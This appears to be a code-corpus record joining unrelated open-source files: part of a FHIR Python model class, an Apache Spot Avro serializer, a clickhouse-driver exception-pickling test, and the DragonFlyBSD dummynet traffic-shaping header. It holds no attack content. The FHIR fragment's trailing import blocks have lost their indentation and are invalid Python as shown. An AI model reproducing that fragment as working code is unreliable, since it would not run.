    """5.3.6.8.1 Sugar ID (Mandatory)."""

    resource_type = "SubstanceNucleicAcidSubunitSugar"

    def __init__(self, jsondict=None, strict=True):
        """Prepare every supported property, then defer to the base class
        to populate the instance from ``jsondict``.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """
        # Substance ID of the sugar or sugar-like component of the nucleotide.
        # Type `Identifier` (represented as `dict` in JSON).
        self.identifier = None

        # Name of the sugar or sugar-like component of the nucleotide.
        # Type `str`.
        self.name = None

        # Residues that contain this sugar, captured in the 5'-3' direction,
        # consistent with the base sequences listed above.
        # Type `str`.
        self.residueSite = None

        super(SubstanceNucleicAcidSubunitSugar, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        """Return property metadata tuples for JSON (de)serialization."""
        properties = super(SubstanceNucleicAcidSubunitSugar, self).elementProperties()
        properties += [
            ("identifier", "identifier", identifier.Identifier, False, None, False),
            ("name", "name", str, False, None, False),
            ("residueSite", "residueSite", str, False, None, False),
        ]
        return properties
import sys
try:
from . import attachment
except ImportError:
attachment = sys.modules[__package__ + '.attachment']
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + '.identifier']
| 4,216 |
365 | <reponame>yellingviv/incubator-spot
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Support custom Avro serializer for transferring data; this can improve performance.
'''
import avro.io
import avro.schema
import io
import logging
AVSC = '''
{
"namespace": "SPOT.INGEST",
"type": "record",
"name": "list.avsc",
"fields": [
{
"name": "list",
"type": [{ "items": "string", "type": "array" }, "null"],
"default": "[]"
}
]
}
'''
def deserialize(rawbytes):
    '''
    Deserialize given bytes according to the supported Avro schema.

    :param rawbytes: Binary string produced by :func:`serialize`.
    :returns : List of ``str`` objects, extracted from the binary stream;
               an empty list if decoding fails for any reason.
    :rtype : ``list``
    '''
    decoder = avro.io.BinaryDecoder(io.BytesIO(rawbytes))
    reader = avro.io.DatumReader(avro.schema.parse(AVSC))

    # The record has a single field named "list" (see AVSC).
    try: return reader.read(decoder)[list.__name__]
    except Exception as exc:
        # Use str(exc) rather than exc.message: the ``message`` attribute was
        # removed from exceptions in Python 3 and would raise AttributeError.
        logging.getLogger('SPOT.INGEST.COMMON.SERIALIZER')\
            .error('[{0}] {1}'.format(exc.__class__.__name__, str(exc)))

    return []
def serialize(value):
    '''
    Convert a ``list`` object to an avro-encoded format.

    :param value: List of ``str`` objects.
    :returns : A buffered I/O implementation using an in-memory bytes buffer,
               or ``None`` if the value cannot be encoded with the schema.
    :rtype : ``io.BytesIO``
    '''
    writer = avro.io.DatumWriter(avro.schema.parse(AVSC))
    rawbytes = io.BytesIO()

    try:
        # The datum is keyed under "list" to match the schema's single field.
        writer.write({ list.__name__: value }, avro.io.BinaryEncoder(rawbytes))
        return rawbytes
    except avro.io.AvroTypeException:
        logging.getLogger('SPOT.INGEST.COMMON.SERIALIZER')\
            .error('The type of ``{0}`` is not supported by the Avro schema.'
                .format(type(value).__name__))

    return None
| 968 |
823 | <gh_stars>100-1000
import pickle
import clickhouse_driver.errors as err
def picklable(obj):
    """Assert that ``obj`` survives a pickle round trip with its textual
    representations (``repr`` and ``str``) intact."""
    round_tripped = pickle.loads(pickle.dumps(obj))
    assert repr(obj) == repr(round_tripped)
    assert str(obj) == str(round_tripped)
def test_exception_picklable():
    """Driver exceptions must survive a pickle round trip, whether built
    from positional or keyword arguments."""
    samples = [
        err.Error('foo'),
        err.Error(message='foo'),
        err.ServerException('foo', 0, Exception()),
        err.ServerException(message='foo', code=0, nested=Exception()),
    ]
    for sample in samples:
        picklable(sample)
| 170 |
432 | <reponame>lambdaxymox/DragonFlyBSD
/*
* Copyright (c) 1998-2002 <NAME>, Universita` di Pisa
* Portions Copyright (c) 2000 Akamba Corp.
* All rights reserved
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* $FreeBSD: src/sys/netinet/ip_dummynet.h,v 1.10.2.9 2003/05/13 09:31:06 maxim Exp $
* $DragonFly: src/sys/net/dummynet/ip_dummynet.h,v 1.19 2008/09/20 04:36:51 sephe Exp $
*/
#ifndef _IP_DUMMYNET_H
#define _IP_DUMMYNET_H
/*
* We start with a heap, which is used in the scheduler to decide when to
* transmit packets etc.
*
* The key for the heap is used for two different values:
*
* 1. Timer ticks- max 10K/second, so 32 bits are enough;
*
* 2. Virtual times. These increase in steps of len/x, where len is the
* packet length, and x is either the weight of the flow, or the sum
* of all weights.
* If we limit to max 1000 flows and a max weight of 100, then x needs
* 17 bits. The packet size is 16 bits, so we can easily overflow if
* we do not allow errors.
*
* So we use a key "dn_key" which is 64 bits.
*
* MY_M is used as a shift count when doing fixed point arithmetic
* (a better name would be useful...).
*/
typedef uint64_t dn_key;	/* sorting key */

/*
 * Number of left shift to obtain a larger precision
 *
 * XXX With this scaling, max 1000 flows, max weight 100, 1Gbit/s, the
 * virtual time wraps every 15 days.
 */
#define MY_M	16	/* fractional bits used for fixed-point arithmetic */
#ifdef _KERNEL
/*
* A heap entry is made of a key and a pointer to the actual object stored
* in the heap.
*
* The heap is an array of dn_heap_entry entries, dynamically allocated.
* Current size is "size", with "elements" actually in use.
*
* The heap normally supports only ordered insert and extract from the top.
* If we want to extract an object from the middle of the heap, we have to
* know where the object itself is located in the heap (or we need to scan
* the whole array). To this purpose, an object has a field (int) which
* contains the index of the object itself into the heap. When the object
* is moved, the field must also be updated. The offset of the index in the
* object is stored in the 'offset' field in the heap descriptor. The
* assumption is that this offset is non-zero if we want to support extract
* from the middle.
*/
struct dn_heap_entry {
	dn_key key;	/* sorting key. Topmost element is smallest one */
	void *object;	/* object pointer */
};

struct dn_heap {
	int size;	/* allocated capacity of the entry array */
	int elements;	/* number of entries actually in use */
	int offset;	/* XXX if > 0 this is the offset of direct ptr to obj */
	struct dn_heap_entry *p;	/* really an array of "size" entries */
};
/*
 * Flow identifier: the fields used to discriminate among different flows
 * when a flow mask is configured on a flow set.
 */
struct dn_flow_id {
	uint16_t fid_type;	/* ETHERTYPE_ */
	uint16_t pad;
	union {
		struct {
			uint32_t dst_ip;
			uint32_t src_ip;
			uint16_t dst_port;
			uint16_t src_port;
			uint8_t proto;
			uint8_t flags;
		} inet;
	} fid_u;

/* Convenience accessors for the IPv4 members of fid_u */
#define fid_dst_ip	fid_u.inet.dst_ip
#define fid_src_ip	fid_u.inet.src_ip
#define fid_dst_port	fid_u.inet.dst_port
#define fid_src_port	fid_u.inet.src_port
#define fid_proto	fid_u.inet.proto
#define fid_flags	fid_u.inet.flags
};
/* Callback used to release the opaque dn_priv reference of a dn_pkt. */
typedef void (*ip_dn_unref_priv_t)(void *);
struct lwkt_port;

/*
 * struct dn_pkt identifies a packet in the dummynet queue, but is also used
 * to tag packets passed back to the various destinations (ip_input(),
 * ip_output() and so on).
 *
 * It is a tag (PACKET_TAG_DUMMYNET) associated with the actual mbuf.
 */
struct dn_pkt {
	struct mbuf *dn_m;		/* the packet itself */
	TAILQ_ENTRY(dn_pkt) dn_next;

	void *dn_priv;			/* opaque caller state */
	ip_dn_unref_priv_t dn_unref_priv; /* releases dn_priv */

	uint32_t dn_flags;		/* action when packet comes out. */
#define DN_FLAGS_IS_PIPE	0x10
#define DN_FLAGS_DIR_MASK	0x0f	/* mask for the DN_TO_* direction */
#define DN_TO_IP_OUT		1
#define DN_TO_IP_IN		2
#define DN_TO_ETH_DEMUX		4
#define DN_TO_ETH_OUT		5
#define DN_TO_MAX		6

	dn_key output_time;		/* when the pkt is due for delivery */
	struct ifnet *ifp;		/* interface, for ip_output */
	struct sockaddr_in *dn_dst;
	struct route ro;		/* route, for ip_output. MUST COPY */
	int flags;			/* flags, for ip_output (IPv6 ?) */

	u_short pipe_nr;		/* pipe/flow_set number */
	u_short pad;

	struct dn_flow_id id;		/* flow id */
	int cpuid;			/* target cpuid, for assertion */
	struct lwkt_port *msgport;	/* target msgport */
};
TAILQ_HEAD(dn_pkt_queue, dn_pkt);
/*
* Overall structure of dummynet (with WF2Q+):
*
* In dummynet, packets are selected with the firewall rules, and passed to
* two different objects: PIPE or QUEUE.
*
* A QUEUE is just a queue with configurable size and queue management policy.
* It is also associated with a mask (to discriminate among different flows),
* a weight (used to give different shares of the bandwidth to different flows)
* and a "pipe", which essentially supplies the transmit clock for all queues
* associated with that pipe.
*
* A PIPE emulates a fixed-bandwidth link, whose bandwidth is configurable.
* The "clock" for a pipe comes from an internal timer. A pipe is also
* associated with one (or more, if masks are used) queue, where all packets
* for that pipe are stored.
*
* The bandwidth available on the pipe is shared by the queues associated with
* that pipe (only one in case the packet is sent to a PIPE) according to the
* WF2Q+ scheduling algorithm and the configured weights.
*
* In general, incoming packets are stored in the appropriate queue, which is
* then placed into one of a few heaps managed by a scheduler to decide when
* the packet should be extracted. The scheduler (a function called dummynet())
* is run at every timer tick, and grabs queues from the head of the heaps when
* they are ready for processing.
*
* There are three data structures definining a pipe and associated queues:
*
* + dn_pipe, which contains the main configuration parameters related to
* delay and bandwidth;
* + dn_flow_set, which contains WF2Q+ configuration, flow masks, plr and
* RED configuration;
* + dn_flow_queue, which is the per-flow queue (containing the packets)
*
* Multiple dn_flow_set can be linked to the same pipe, and multiple
* dn_flow_queue can be linked to the same dn_flow_set.
* All data structures are linked in a linear list which is used for
* housekeeping purposes.
*
* During configuration, we create and initialize the dn_flow_set and dn_pipe
* structures (a dn_pipe also contains a dn_flow_set).
*
* At runtime: packets are sent to the appropriate dn_flow_set (either WFQ
* ones, or the one embedded in the dn_pipe for fixed-rate flows), which in
* turn dispatches them to the appropriate dn_flow_queue (created dynamically
* according to the masks).
*
* The transmit clock for fixed rate flows (ready_event()) selects the
* dn_flow_queue to be used to transmit the next packet. For WF2Q,
* wfq_ready_event() extract a pipe which in turn selects the right flow using
* a number of heaps defined into the pipe itself.
*/
/*
* Per flow queue. This contains the flow identifier, the queue of packets,
* counters, and parameters used to support both RED and WF2Q+.
*
* A dn_flow_queue is created and initialized whenever a packet for a new
* flow arrives.
*/
struct dn_flow_queue {
	struct dn_flow_id id;		/* flow this queue belongs to */
	LIST_ENTRY(dn_flow_queue) q_link;

	struct dn_pkt_queue queue;	/* queue of packets */
	u_int len;			/* queue length, in packets */
	u_int len_bytes;		/* queue length, in bytes */
	u_long numbytes;		/* credit for transmission (dynamic queues) */

	uint64_t tot_pkts;		/* statistics counters */
	uint64_t tot_bytes;
	uint32_t drops;

	int hash_slot;			/* debugging/diagnostic */

	/* RED parameters */
	int avg;			/* average queue length est. (scaled) */
	int count;			/* arrivals since last RED drop */
	int random;			/* random value (scaled) */
	uint32_t q_time;		/* start of queue idle time */

	/* WF2Q+ support */
	struct dn_flow_set *fs;		/* parent flow set */
	int heap_pos;			/* position (index) of struct in heap */
	dn_key sched_time;		/* current time when queue enters ready_heap */

	dn_key S, F;			/* start time, finish time */
	/*
	 * Setting F < S means the timestamp is invalid. We only need
	 * to test this when the queue is empty.
	 */
};
LIST_HEAD(dn_flowqueue_head, dn_flow_queue);
/*
* flow_set descriptor. Contains the "template" parameters for the queue
* configuration, and pointers to the hash table of dn_flow_queue's.
*
* The hash table is an array of lists -- we identify the slot by hashing
* the flow-id, then scan the list looking for a match.
* The size of the hash table (buckets) is configurable on a per-queue basis.
*
* A dn_flow_set is created whenever a new queue or pipe is created (in the
* latter case, the structure is located inside the struct dn_pipe).
*/
struct dn_flow_set {
	u_short fs_nr;			/* flow_set number */
	u_short flags_fs;		/* see 'Flow set flags' */

	LIST_ENTRY(dn_flow_set) fs_link; /* linear list, for housekeeping */

	struct dn_pipe *pipe;		/* pointer to parent pipe */
	u_short parent_nr;		/* parent pipe#, 0 if local to a pipe */

	int weight;			/* WFQ queue weight */
	int qsize;			/* queue size in slots or bytes */
	int plr;			/* pkt loss rate (2^31-1 means 100%) */

	struct dn_flow_id flow_mask;	/* fields that discriminate flows */

	/* hash table of queues onto this flow_set */
	int rq_size;			/* number of slots */
	int rq_elements;		/* active elements */
	struct dn_flowqueue_head *rq;	/* array of rq_size entries */

	uint32_t last_expired;		/* do not expire too frequently */
	int backlogged;			/* #active queues for this flowset */

	/* RED parameters */
	int w_q;			/* queue weight (scaled) */
	int max_th;			/* maximum threshold for queue (scaled) */
	int min_th;			/* minimum threshold for queue (scaled) */
	int max_p;			/* maximum value for p_b (scaled) */

	u_int c_1;			/* max_p/(max_th-min_th) (scaled) */
	u_int c_2;			/* max_p*min_th/(max_th-min_th) (scaled) */
	u_int c_3;			/* for GRED, (1-max_p)/max_th (scaled) */
	u_int c_4;			/* for GRED, 1 - 2*max_p (scaled) */
	u_int *w_q_lookup;		/* lookup table for computing (1-w_q)^t */
	u_int lookup_depth;		/* depth of lookup table */
	int lookup_step;		/* granularity inside the lookup table */
	int lookup_weight;		/* equal to (1-w_q)^t / (1-w_q)^(t+1) */
	int avg_pkt_size;		/* medium packet size */
	int max_pkt_size;		/* max packet size */
};
LIST_HEAD(dn_flowset_head, dn_flow_set);
/*
* Pipe descriptor. Contains global parameters, delay-line queue, and the
* flow_set used for fixed-rate queues.
*
* For WF2Q+ support it also has 3 heaps holding dn_flow_queue:
* + not_eligible_heap, for queues whose start time is higher than the
* virtual time. Sorted by start time.
* + scheduler_heap, for queues eligible for scheduling. Sorted by finish
* time.
* + idle_heap, all flows that are idle and can be removed. We do that on
* each tick so we do not slow down too much operations during forwarding.
*/
struct dn_pipe {		/* a pipe */
	int pipe_nr;			/* number */
	int bandwidth;			/* really, bytes/tick. */
	int delay;			/* really, ticks */

	struct dn_pkt_queue p_queue;	/* packets in delay line */
	LIST_ENTRY(dn_pipe) p_link;	/* linear list, for housekeeping */

	/* WF2Q+ scheduling heaps (see the overview comment above) */
	struct dn_heap scheduler_heap;	/* top extract - key Finish time */
	struct dn_heap not_eligible_heap; /* top extract - key Start time */
	struct dn_heap idle_heap;	/* random extract - key Start=Finish time */

	dn_key V;			/* virtual time */
	int sum;			/* sum of weights of all active sessions */
	int numbytes;			/* bits I can transmit (more or less). */

	dn_key sched_time;		/* time pipe was scheduled in ready_heap */

	struct dn_flow_set fs;		/* used with fixed-rate flows */
};
LIST_HEAD(dn_pipe_head, dn_pipe);
/*
 * Socket-option shuttle: carries the option name and its argument buffer
 * into the dummynet control entry point (see ip_dn_ctl_t).
 */
struct dn_sopt {
	int	dn_sopt_name;
	void	*dn_sopt_arg;
	size_t	dn_sopt_arglen;
};

/* Hook types filled in when the dummynet module is loaded. */
typedef int ip_dn_ctl_t(struct dn_sopt *);	/* configuration/control */
typedef int ip_dn_io_t(struct mbuf *);		/* packet intake */

extern ip_dn_ctl_t *ip_dn_ctl_ptr;
extern ip_dn_io_t *ip_dn_io_ptr;

void	ip_dn_queue(struct mbuf *);
void	ip_dn_packet_free(struct dn_pkt *);
void	ip_dn_packet_redispatch(struct dn_pkt *);
int	ip_dn_sockopt(struct sockopt *);

/* True once the dummynet module has installed its I/O hook. */
#define	DUMMYNET_LOADED	(ip_dn_io_ptr != NULL)
#endif /* _KERNEL */
/*
 * Fixed-size flow id used by the dn_ioc_* structures below; it mirrors
 * struct dn_flow_id, with a 64-byte pad reserving room for other
 * address families without changing the structure size.
 */
struct dn_ioc_flowid {
	uint16_t type;		/* ETHERTYPE_ */
	uint16_t pad;
	union {
		struct {
			uint32_t dst_ip;
			uint32_t src_ip;
			uint16_t dst_port;
			uint16_t src_port;
			uint8_t proto;
			uint8_t flags;
		} ip;
		uint8_t pad[64];
	} u;
};
/*
 * Per-flow-queue state/statistics snapshot; presumably exchanged with
 * userland through the dummynet sockopt interface (the reserved bytes
 * leave room for future extension) -- confirm against the callers.
 */
struct dn_ioc_flowqueue {
	u_int len;		/* queued packets */
	u_int len_bytes;	/* queued bytes */
	uint64_t tot_pkts;
	uint64_t tot_bytes;
	uint32_t drops;

	int hash_slot;		/* debugging/diagnostic */
	dn_key S;		/* virtual start time */
	dn_key F;		/* virtual finish time */

	struct dn_ioc_flowid id;
	uint8_t reserved[16];
};
/*
 * Flow set configuration record. fs_type (DN_IS_PIPE or DN_IS_QUEUE)
 * MUST stay the first member: dn_ioc_pipe embeds this structure first,
 * so the type field distinguishes the two record kinds.
 */
struct dn_ioc_flowset {
	u_short fs_type;	/* DN_IS_{QUEUE,PIPE}, MUST be first */

	u_short fs_nr;		/* flow_set number */
	u_short flags_fs;	/* see 'Flow set flags' */
	u_short parent_nr;	/* parent pipe#, 0 if local to a pipe */

	int weight;		/* WFQ queue weight */
	int qsize;		/* queue size in slots or bytes */
	int plr;		/* pkt loss rate (2^31-1 means 100%) */

	/* Hash table information */
	int rq_size;		/* number of slots */
	int rq_elements;	/* active elements */

	/* RED parameters */
	int w_q;		/* queue weight (scaled) */
	int max_th;		/* maximum threshold for queue (scaled) */
	int min_th;		/* minimum threshold for queue (scaled) */
	int max_p;		/* maximum value for p_b (scaled) */
	int lookup_step;	/* granularity inside the lookup table */
	int lookup_weight;	/* equal to (1-w_q)^t / (1-w_q)^(t+1) */

	struct dn_ioc_flowid flow_mask;
	uint8_t reserved[16];	/* room for future extension */
};
/*
 * Pipe configuration record; embeds the flow set header first so the
 * record kind can be told apart via fs.fs_type (see dn_ioc_flowset).
 */
struct dn_ioc_pipe {
	struct dn_ioc_flowset fs;	/* MUST be first */

	int pipe_nr;		/* pipe number */
	int bandwidth;		/* bit/second */
	int delay;		/* milliseconds */

	dn_key V;		/* virtual time */
	uint8_t reserved[16];	/* room for future extension */
};
/*
 * Flow set flags (flags_fs)
 */
#define DN_HAVE_FLOW_MASK	0x0001
#define DN_IS_RED		0x0002
#define DN_IS_GENTLE_RED	0x0004
#define DN_QSIZE_IS_BYTES	0x0008	/* queue size is measured in bytes */
#define DN_NOERROR		0x0010	/* do not report ENOBUFS on drops */
#define DN_IS_PIPE		0x4000	/* fs_type marker, see dn_ioc_flowset */
#define DN_IS_QUEUE		0x8000	/* fs_type marker, see dn_ioc_flowset */
/*
 * Macros for RED fixed-point arithmetic (SCALE_RED fractional bits).
 */
#define SCALE_RED	16
#define SCALE(x)	((x) << SCALE_RED)		/* int -> fixed point */
#define SCALE_VAL(x)	((x) >> SCALE_RED)		/* fixed point -> int */
#define SCALE_MUL(x, y)	(((x) * (y)) >> SCALE_RED)	/* fixed-point multiply */

/*
 * Maximum pipe number
 */
#define DN_PIPE_NR_MAX	65536
#endif /* !_IP_DUMMYNET_H */
| 5,730 |